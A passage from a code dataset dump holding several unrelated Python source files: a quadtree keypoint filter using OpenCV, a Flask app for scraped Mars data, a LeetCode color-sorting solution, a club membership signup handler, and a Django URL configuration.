in tree.__dict__:\n self.get_point(tree.nw)\n if 'ne' in tree.__dict__:\n self.get_point(tree.ne)\n if 'se' in tree.__dict__:\n self.get_point(tree.se)\n if 'sw' in tree.__dict__:\n self.get_point(tree.sw)\n return self.list1\n def get_point2(self,tree):\n if tree.divided:\n self.list1=self.list1+[tree.points[-2],tree.points[-1],tree.points[0]]\n self.get_point2(tree.nw)\n self.get_point2(tree.ne)\n self.get_point2(tree.se)\n self.get_point2(tree.sw)\n return self.list1\n def get_bound(self,tree):\n #self.list1.append(tree.boundary)\n #print(self.list1)\n if not tree.divided:\n self.list1.append(tree.boundary)\n #self.list1.append(tree.ne.boundary)\n #self.list1.append(tree.se.boundary)\n #self.list1.append(tree.sw.boundary)\n else:\n self.list1.append(tree.nw.boundary)\n self.list1.append(tree.ne.boundary)\n self.list1.append(tree.se.boundary)\n self.list1.append(tree.sw.boundary)\n self.get_bound(tree.nw)\n self.get_bound(tree.ne)\n self.get_bound(tree.se)\n self.get_bound(tree.sw)\n return self.list1\n \n def __str__(self) -> str:\n print(self.list1)\n\n\nclass Point:\n \"\"\"A point located at (x,y) in 2D space.\n\n Each Point object may be associated with a payload object.\n\n \"\"\"\n\n def __init__(self, x, y, payload=None):\n self.x, self.y = x, y\n self.payload = payload\n\n def __repr__(self):\n return '{}: {}'.format(str((self.x, self.y)), repr(self.payload))\n\n def distance_to(self, other):\n try:\n other_x, other_y = other.x, other.y\n except AttributeError:\n other_x, other_y = other\n return np.hypot(self.x - other_x, self.y - other_y)\n\nclass Rect:\n \"\"\"A rectangle centred at (cx, cy) with width w and height h.\"\"\"\n\n def __init__(self, cx, cy, w, h):\n self.cx, self.cy = cx, cy\n self.w, self.h = w, h\n self.west_edge, self.east_edge = cx - w/2, cx + w/2\n self.north_edge, self.south_edge = cy - h/2, cy + h/2\n\n def __repr__(self):\n return str((self.west_edge, self.east_edge, self.north_edge,\n self.south_edge))\n\n def contains(self, point):\n \"\"\"Is point (a Point object or (x,y) tuple) inside this Rect?\"\"\"\n\n try:\n point_x, point_y = point.x, point.y\n except AttributeError:\n point_x, point_y = point\n\n return (point_x >= self.west_edge and\n point_x < self.east_edge and\n point_y >= self.north_edge and\n point_y < self.south_edge)\n\n def intersects(self, other):\n \"\"\"Does Rect object other interesect this Rect?\"\"\"\n return not (other.west_edge > self.east_edge or\n other.east_edge < self.west_edge or\n other.north_edge > self.south_edge or\n other.south_edge < self.north_edge)\n\n def draw(self, ax, c='k', lw=1, **kwargs):\n x1, y1 = self.west_edge, self.north_edge\n x2, y2 = self.east_edge, self.south_edge\n ax.plot([x1,x2,x2,x1,x1],[y1,y1,y2,y2,y1], c=c, lw=lw, **kwargs)\n\n\nclass QuadTree:\n \"\"\"A class implementing a quadtree.\"\"\"\n\n def __init__(self, boundary, max_points=1, depth=0):\n \"\"\"Initialize this node of the quadtree.\n\n boundary is a Rect object defining the region from which points are\n placed into this node; max_points is the maximum number of points the\n node can hold before it must divide (branch into four more nodes);\n depth keeps track of how deep into the quadtree this node lies.\n\n \"\"\"\n\n self.boundary = boundary\n self.max_points = max_points\n self.points = []\n self.depth = depth\n self.points2=[]\n # A flag to indicate whether this node has divided (branched) or not.\n self.divided = False\n\n def __str__(self):\n \"\"\"Return a string representation of this node, suitably formatted.\"\"\"\n sp = ' ' * self.depth * 2\n s = str(self.boundary) + '\\n'\n s += sp + ', '.join(str(point) for point in self.points)\n if not self.divided:\n return s\n return s + '\\n' + '\\n'.join([\n sp + 'nw: ' + str(self.nw), sp + 'ne: ' + str(self.ne),\n sp + 'se: ' + str(self.se), sp + 'sw: ' + str(self.sw)])\n\n def divide(self):\n \"\"\"Divide (branch) this node by spawning four children nodes.\"\"\"\n \n cx, cy = self.boundary.cx, self.boundary.cy\n w, h = self.boundary.w / 2, self.boundary.h / 2\n # The boundaries of the four children nodes are \"northwest\",\n # \"northeast\", \"southeast\" and \"southwest\" quadrants within the\n # boundary of the current node.\n self.nw = QuadTree(Rect(cx - w/2, cy - h/2, w, h),\n self.max_points, self.depth + 1)\n self.ne = QuadTree(Rect(cx + w/2, cy - h/2, w, h),\n self.max_points, self.depth + 1)\n self.se = QuadTree(Rect(cx + w/2, cy + h/2, w, h),\n self.max_points, self.depth + 1)\n self.sw = QuadTree(Rect(cx - w/2, cy + h/2, w, h),\n self.max_points, self.depth + 1)\n self.divided = True\n\n def insert(self, point):\n \"\"\"Try to insert Point point into this QuadTree.\"\"\"\n if self.depth<5:\n if not self.boundary.contains(point):\n # The point does not lie inside boundary: bail.\n return False\n if len(self.points) < self.max_points:\n # There's room for our point without dividing the QuadTree.\n self.points.append(point)\n return True\n #self.points2=[self.points[-2],self.points[-1]]\n # No room: divide if necessary, then try the sub-quads.\n if not self.divided:\n self.divide()\n\n return (self.ne.insert(point) or self.nw.insert(point) or self.se.insert(point) or self.sw.insert(point))\n else:\n return 1\n\n\n def __len__(self):\n \"\"\"Return the number of points in the quadtree.\"\"\"\n\n npoints = len(self.points)\n if self.divided:\n npoints += len(self.nw)+len(self.ne)+len(self.se)+len(self.sw)\n return npoints\n\n def draw(self, ax):\n \"\"\"Draw a representation of the quadtree on Matplotlib Axes ax.\"\"\"\n\n self.boundary.draw(ax)\n if self.divided:\n self.nw.draw(ax)\n self.ne.draw(ax)\n self.se.draw(ax)\n self.sw.draw(ax)\n\n def read(self, data):\n pts = cv.KeyPoint_convert(data)\n xs = np.array(pts[:,0])\n ys = np.array(pts[:,1])\n points = [Point(xs[i],ys[i]) for i in range(len(pts))]\n\nDPI = 72\nwidth, height = 256,256\n\npts = cv.KeyPoint_convert(kp1)\nxs = np.array(pts[:,0])\nys = np.array(pts[:,1])\n\npoints = [Point(xs[i],ys[i]) for i in range(len(pts))]\n\ndomain = Rect(width/2, height/2, width, height)\nqtree = QuadTree(domain, 3)\nfor point in points:\n qtree.insert(point)\nprint('Number of points in the domain =', len(qtree))\n\nfig = plt.figure(figsize=(256/DPI,256/DPI),dpi = DPI)\nax = plt.subplot()\nax.set_xlim(0,width)\nax.set_ylim(0,height)\nqtree.draw(ax)\n\nx=Anagrams(qtree)\nlist1=x.get_bound(x.qtree)\nlist2=set(x.list1)\npoint3=[]\nfor i in list2:\n for j in points:\n if i.contains(j)==True:\n point3.append(j)\n break\n\nax.scatter([p.x for p in point3 ], [p.y for p in point3], s=4)\nax.set_xticks([])\nax.set_yticks([])\n\nax.invert_yaxis()\nplt.tight_layout()\n# plt.savefig('search-quadtree.png', DPI=72)\nplt.show()\n\nkeypoints = []\nfor i in point3:\n a=str(i).split(':')[0].replace('P','')\n b=eval(a)\n keypoints.append(b)\n\n# get the corresponding descriptor\ndescriptor = []\nfor i in keypoints:\n descriptor.append(desc1[np.where(pts == i)])\nprint(len(descriptor))\nprint(len(keypoints))\n\nkp1 = cv.KeyPoint_convert(keypoints)\n\nsift_image = cv.drawKeypoints(img1, kp1, img1)\ncv.imshow('image', sift_image)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"zhoux121/843-Project","sub_path":"src/quadTree.py","file_name":"quadTree.py","file_ext":"py","file_size_in_byte":9687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25676900817","text":"#Use Flask to render a template, redirect to another url, and create a url\r\n#use the scraping code to convert from jupyter notebook to python\r\nfrom flask import Flask, render_template, redirect, url_for\r\n\r\n#use PyMongo to interact with Mongo Database\r\nfrom flask_pymongo import PyMongo\r\nimport scraping \r\n\r\n#Set up Flask\r\napp = Flask(__name__)\r\n\r\n# Use flask_pymongo to set up mongo connection\r\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\r\nmongo = PyMongo(app)\r\n\r\n#What should we see at our homepage?\r\n@app.route(\"/\")\r\ndef index():\r\n #Use PyMongo to find the \"mars\" collection in the database (assigned as 'mars')\r\n mars = mongo.db.mars.find_one()\r\n #Tell Flask to return an HTML template using index.html, \r\n #'mars=mars' tells python to use the 'mars' collection in MongoDB\r\n return render_template(\"Challenge_index.html\", mars=mars)\r\n\r\n#Set up the Scraping Route\r\n@app.route(\"/scrape\")\r\ndef scrape():\r\n #assign mars variable to the mars database data\r\n mars = mongo.db.mars\r\n # new variable for scraped data (using spraping.py instructions)\r\n mars_data = scraping.scrape_all()\r\n #Add new data to mars (upsert = create new document if one doesnt already exist)\r\n mars.update({}, mars_data, upsert=True)\r\n return redirect('/', code=302)\r\n\r\nif __name__ == \"__main__\":\r\n app.run()\r\n","repo_name":"murphyk2021/Mission-to-Mars","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15389087190","text":"class Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n counts=[0]*3\n \n for i in nums:\n counts[i]+=1\n i=0\n for j in range(3):\n while counts[j]>0:\n nums[i]=j\n i+=1\n counts[j]-=1\n \n","repo_name":"Hiwot2127/Competitive_Programming","sub_path":"Sort_Colors.py","file_name":"Sort_Colors.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16939431118","text":"from config import JINJA_ENVIRONMENT\nfrom constants import *\nfrom google.appengine.api import mail\nfrom model import Country\nfrom model import Member\nfrom model import MemberType\nfrom model import Status\nimport datetime\nimport dbutils\nimport jinja2\nimport webapp2\nimport cStringIO\nfrom utils.giro import PdfGenerator\nfrom config import Configuration\nfrom jinja2 import Template\nimport constants\n\n\nclass Signup(webapp2.RequestHandler):\n \"\"\"Member signup form\"\"\"\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template(\n 'templates/selfservice/signup.html')\n countries = Country.all().order('order').fetch(100)\n self.response.write(template.render({\n 'countries': countries,\n 'incomplete': [],\n 'complete': [],\n 'values': {}}))\n\n def get_check_field(self, name, incomplete_list, required=True):\n value = self.request.get(name)\n if required and (not value or value.strip() == ''):\n incomplete_list.append(name)\n return (value, incomplete_list)\n\n def post(self):\n complete = []\n incomplete = []\n values = {}\n\n # Holy crap this is ugly. There has to be a better way.\n\n name = self.request.get('name')\n if not name or name.strip() == '' or name.strip().startswith('http'):\n incomplete.append('name')\n else:\n values['name'] = name\n complete.append('name')\n\n address = self.request.get('address')\n # Spammers put URLs in the address field so we reject those right away\n if not address or address.strip() == '' or address.strip().startswith('http'):\n incomplete.append('address')\n else:\n values['address'] = address\n complete.append('address')\n\n zipcode = self.request.get('zip')\n if (not zipcode or zipcode.strip() == '') or len(zipcode.strip()) < 4:\n incomplete.append('zip')\n else:\n values['zip'] = zipcode\n complete.append('zip')\n\n city = self.request.get('city')\n if not city or city.strip() == '':\n incomplete.append('city')\n else:\n values['city'] = city\n complete.append('city')\n\n if 'zip' in incomplete or 'city' in incomplete:\n incomplete.append('zipcity')\n\n country_key = self.request.get('country').strip()\n country = Country.get(country_key)\n\n countries = Country.all().order('order').fetch(100)\n\n if not country or not country_key or country_key.strip() == '':\n incomplete.append('country')\n # retrieve countries since we're going to need them\n else:\n values['country'] = country.name\n complete.append('country')\n\n email = self.request.get('email')\n if not email or email.strip() == '' or not mail.is_email_valid(email):\n incomplete.append('email')\n else:\n values['email'] = email\n complete.append('email')\n\n mobile = self.request.get('mobile')\n if mobile and mobile.strip() == '':\n mobile = None\n values['mobile'] = mobile\n\n home = self.request.get('home')\n if home and home.strip() == '':\n home = None\n values['home'] = home\n\n work = self.request.get('work')\n if work and work.strip() == '':\n work = None\n values['work'] = work\n\n member_type = self.request.get('type')\n if not member_type or member_type.strip() == '':\n member_type = '1'\n\n types = MemberType.all().fetch(100)\n\n mtype = None\n\n # TODO: Custom settings? Constants at least.\n if member_type == '1':\n mtype = next(t for t in types if t.name == DEFAULT_MEMBER_NAME)\n else:\n mtype = next(t for t in types if t.name ==\n DEFAULT_SUPPORT_MEMBER_NAME)\n\n values['type'] = mtype.name\n comment = self.request.get('comment')\n complete.append('comment')\n values['comment'] = comment\n\n error_message = ''\n\n # Check if member exists;\n existing = Member.all().filter('email', email).fetch(1)\n\n if len(existing) > 0:\n incomplete.append('email')\n error_message = 'Det er allerede registrert noen i medlemsregisteret med denne epostadressen!'\n # TODO: Error message\n\n if len(incomplete) > 0:\n # missing field, redirect to signup page again\n template = JINJA_ENVIRONMENT.get_template(\n 'templates/selfservice/signup.html')\n return self.response.write(template.render({\n 'countries': countries,\n 'incomplete': incomplete,\n 'complete': complete,\n 'error_message': error_message,\n 'values': values}))\n\n # invariant: fields are OK, create new member, send mail,\n # create payment history on member.\n template = JINJA_ENVIRONMENT.get_template(\n 'templates/selfservice/signup_receipt.html')\n data = {\n 'values': values,\n 'profile_url': PROFILE_URL\n }\n\n statuses = Status.all().fetch(100)\n\n # TODO: Handle existing members signing up again\n\n new_member = Member()\n\n new_member.name = name\n new_member.address = address\n new_member.zipcode = zipcode\n new_member.city = city\n new_member.notes = comment\n new_member.country = country\n new_member.membertype = mtype\n\n status = next(s for s in statuses if s.name == SIGNUP_STATUS_NAME)\n new_member.status = status\n\n new_member.number = dbutils.create_new_member_no()\n\n new_member.email = email\n new_member.member_since = datetime.date.today()\n if mobile:\n new_member.phone = mobile\n if work:\n new_member.phone_work = work\n if home:\n new_member.phone_home = home\n new_member.generate_access_code()\n new_member.member_since = datetime.date.today()\n new_member.member_type = mtype\n new_member.put()\n new_member.update_index()\n\n self.send_welcome_mail(new_member)\n self.send_notification_mails(new_member)\n\n # TODO: Invalidate counts for categories\n # Handle mutations on members gracefully\n\n return self.response.write(template.render(data))\n\n def send_welcome_mail(self, member):\n \"\"\"Send welcom email with attachments\"\"\"\n config = Configuration()\n sender_address = config.get('WELCOME_MAIL_SENDER')\n subject = config.get('WELCOME_MAIL_SUBJECT')\n account_no = config.get('GIRO_ACCOUNT_NO')\n\n mail_template = Template(config.get('WELCOME_MAIL_TEXT'))\n\n data = {\n 'member': member,\n 'year': datetime.date.today().year,\n 'accountno': account_no,\n 'profile_url': constants.PROFILE_URL\n }\n body = mail_template.render(data)\n\n buf = cStringIO.StringIO()\n address = member.name + '\\n' + member.address + \\\n '\\n' + member.zipcode + ' ' + member.city\n if member.country.name != 'Norge':\n address = address + '\\n' + member.country.name\n\n body_template = Template(config.get('GIRO_TEXT'))\n message_template = Template(config.get('GIRO_MESSAGE'))\n\n data = {'member_no': member.number, 'account_no': account_no,\n 'access_code': member.edit_access_code, 'profile_url': constants.PROFILE_URL}\n\n due_date = datetime.datetime.now() + datetime.timedelta(days=14)\n due_date_str = due_date.strftime('%d.%m.%Y')\n\n current_date = datetime.datetime.now()\n if current_date.month >= 7:\n fee = member.member_type.fee / 2\n else:\n fee = member.member_type.fee\n\n pdf = PdfGenerator(member_address=address, club_address=config.get('GIRO_ADDRESS'), account_no=account_no,\n member_no=member.number, access_code=member.edit_access_code, profile_url=constants.PROFILE_URL,\n heading=config.get('GIRO_SUBJECT'), body=body_template.render(data), fee=fee,\n due_date=due_date_str, payment_message=message_template.render(data))\n\n pdf.generate_pdf(buf)\n\n mail.send_mail(sender_address, member.email, subject,\n body, attachments=[('kontingent.pdf', buf.getvalue())])\n\n def send_notification_mails(self, member):\n \"\"\"Send the notification mail\"\"\"\n config = Configuration()\n sender_address = config.get('WELCOME_MAIL_SENDER')\n subject = config.get('NOTIFICATION_MAIL_SUBJECT')\n recipients = config.get('NOTIFICATION_MAIL_RECIPIENTS')\n\n mail_template = JINJA_ENVIRONMENT.get_template(\n 'templates/emails/notification_signup.txt')\n data = {\n 'member': member,\n 'server_url': SERVER_URL\n }\n body = mail_template.render(data)\n\n mail.send_mail(sender_address, recipients, subject, body)\n","repo_name":"KlubbAlfaRomeoNorge/members","sub_path":"views/selfservice/signup.py","file_name":"signup.py","file_ext":"py","file_size_in_byte":9142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33889155911","text":"\"\"\"scrum_app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nadmin.autodiscover()\nurlpatterns = [\n # url(r'^app/teams/', include('scrum_teams.urls', namespace='scrum_teams')),\n url(r'^app/dashboard/', include('tasks.urls', namespace='tasks')),\n url(r'^app/stories/tasks/', include('tasks.urls', namespace='tasks')),\n url(r'^app/stories/', include('user_stories.urls', namespace='user_stories')),\n url(r'^app/sprint/', include('sprint.urls', namespace='sprint')),\n \n\turl(r'^app/', include('user_profiles.urls', namespace='user_profiles')),\n\t#url(r'^admin/', include(admin.site.urls)),\n url(r'^$', RedirectView.as_view(url='/app/dashboard/')),\n]\nhandler404 = 'user_profiles.views.handler404'\nhandler403 = 'user_profiles.views.handler403'\nhandler500 = 'user_profiles.views.handler500'\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"kumar23/scrum_app","sub_path":"scrum_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}